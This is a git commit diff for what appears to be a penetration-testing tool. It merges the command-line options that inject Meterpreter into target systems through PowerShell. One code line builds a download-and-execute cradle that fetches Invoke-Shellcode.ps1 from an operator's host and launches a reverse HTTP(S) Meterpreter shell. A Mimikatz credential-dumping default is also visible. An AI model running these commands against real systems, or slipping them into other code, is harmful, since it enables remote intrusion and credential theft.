Consolidated Meterpreter injection options

main
byt3bl33d3r 2015-10-07 22:21:25 -06:00
parent cd048eab37
commit e48fc47e11
2 changed files with 11 additions and 14 deletions

View File

@ -107,15 +107,13 @@ Command Execution:
Shellcode/EXE/DLL/Meterpreter Injection: Shellcode/EXE/DLL/Meterpreter Injection:
Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell
--inject {shellcode,exe,meterpreter,dll} --inject {met_reverse_http,met_reverse_https,exe,shellcode,dll}
Inject Shellcode, EXE, DLL or Meterpreter Inject Shellcode, EXE, DLL or Meterpreter
--path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems --path PATH Path to the Shellcode/EXE/DLL you want to inject on the target systems
--procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process) --procid PROCID Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)
--exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE) --exeargs EXEARGS Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)
--met {reverse_https,reverse_http}
Specify the Meterpreter to inject
--met-options LHOST LPORT --met-options LHOST LPORT
Meterpreter options Meterpreter options (ignored if not injecting Meterpreter)
Filesystem Interaction: Filesystem Interaction:
Options for interacting with filesystems Options for interacting with filesystems

View File

@ -2661,11 +2661,11 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
def inject_pscommand(localip): def inject_pscommand(localip):
if args.inject == 'meterpreter': if args.inject.startswith('met_'):
command = """ command = """
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1'); IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip, Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
args.met, args.inject[4:],
args.met_options[0], args.met_options[0],
args.met_options[1]) args.met_options[1])
if args.procid: if args.procid:
@ -3010,12 +3010,11 @@ if __name__ == '__main__':
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command') cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell") xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'meterpreter'}, help='Inject Shellcode, EXE, DLL or Meterpreter') xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'met_reverse_https', 'met_reverse_http'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems') xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)') xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)') xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
xgroup.add_argument("--met", choices={'reverse_http', 'reverse_https'}, dest='met', help='Specify the Meterpreter to inject') xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options (ignored if not injecting Meterpreter)')
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options')
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems") bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory') bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
@ -3036,7 +3035,7 @@ if __name__ == '__main__':
log.setLevel(logging.INFO) log.setLevel(logging.INFO)
if args.inject: if args.inject:
if args.inject != 'meterpreter': if not args.inject.startswith('met_'):
if not args.path: if not args.path:
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject") print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
sys.exit(1) sys.exit(1)
@ -3046,9 +3045,9 @@ if __name__ == '__main__':
print_error('Unable to find Shellcode/EXE/DLL at specified path') print_error('Unable to find Shellcode/EXE/DLL at specified path')
sys.exit(1) sys.exit(1)
elif args.inject == 'meterpreter': elif args.inject.startswith('met_'):
if not args.met_options or not args.met: if not args.met_options:
print_error('You must specify a Meterpreter and it\'s options using \'--met\' and \'--met-options\'' ) print_error('You must specify Meterpreter\'s options using --met-options' )
sys.exit(1) sys.exit(1)
if os.path.exists(args.target[0]): if os.path.exists(args.target[0]):